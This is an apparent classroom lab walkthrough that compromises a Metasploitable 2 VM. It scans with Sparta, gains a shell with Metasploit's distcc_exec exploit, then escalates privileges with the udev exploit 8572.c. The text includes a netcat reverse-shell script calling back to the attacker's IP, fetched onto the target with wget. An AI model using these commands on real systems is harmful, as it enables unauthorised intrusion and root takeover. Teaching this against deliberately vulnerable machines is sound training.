On Kali, in a Terminal, execute this command.
sparta
In the Sparta window, click "Click
here to add host(s) to scope". In the
"Add hosts(s) to scope" box,
enter your Metasploitable 2 IP address,
as shown below.
Click the "Add to scope" button.
Within a few seconds, Sparta finds the more obvious services, but it keeps scanning.
A box will pop up attempting to show a screenshot. Close it.
After about 2 minutes, it will find "distcc", as shown below.
DistCC is a used to scale large compiler jobs across systems, but it can be abused to execute arbitrary commands.
Close Sparta.
msfconsole
In Metasploit,
execute this command.
search distcc
In Metasploit,
execute this command.
info exploit/unix/misc/distcc_exec
As shown below, this exploit
only requires RHOST.
In Metasploit, execute these commands, using the IP of your Metasploitable 2 target.
use exploit/unix/misc/distcc_exec
set RHOST 172.16.1.190
exploit
whoami
You get a shell, running as "daemon",
as shown below.
Save a FULL DESKTOP image with the filename Proj 18xa from Your Name.
In Metasploit, in the command shell, execute these commands.
uname -a
lsb_release -a
The target has kernel 2.6.24
and is running Ubuntu 8.04,
as shown below.
searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
We'll use the 8572.c exploit,
highlighted in the image below.
On Kali, execute this command, to examine the exploit source code.
less /usr/share/exploitdb/platforms/linux/local/8572.c
Information about the exploit
appears, as shown below.
Read it and then press Q to exit "less".
service apache2 restart
ln -s /usr/share/exploitdb/platforms/linux/local/ /var/www/html/
We'll use a simple netcat reverse shell.
On Kali, execute this command.
nano /var/www/html/run
In nano, enter these lines,
replacing the IP address with the
address of your Kali machine.
#!/bin/bash
nc 172.16.1.188 12345 -e /bin/bash
Press Ctrl+C, Y,
Enter to save the file.
cd /tmp
wget http://172.16.1.188/run
wget http://172.16.1.188/local/8572.c
gcc -o exploit 8572.c
ls -l
On Kali, in your low-privilege shell, execute these commands to list network processes, and the udev process.
cat /proc/net/netlink
ps aux | grep udev
The only nonzero PID in netlink should
be the number you want. When I did it,
it was 2738, as shown below.
For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.
On Kali, open a new Terminal window and execute these command to listen for connections.
nc -lvp 12345
./exploit 2738
The only nonzero PID in netlink should
be the number you want. When I did it,
it was 2738, as shown below.
For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.
Save a FULL DESKTOP image with the filename Proj 18xb from Your Name.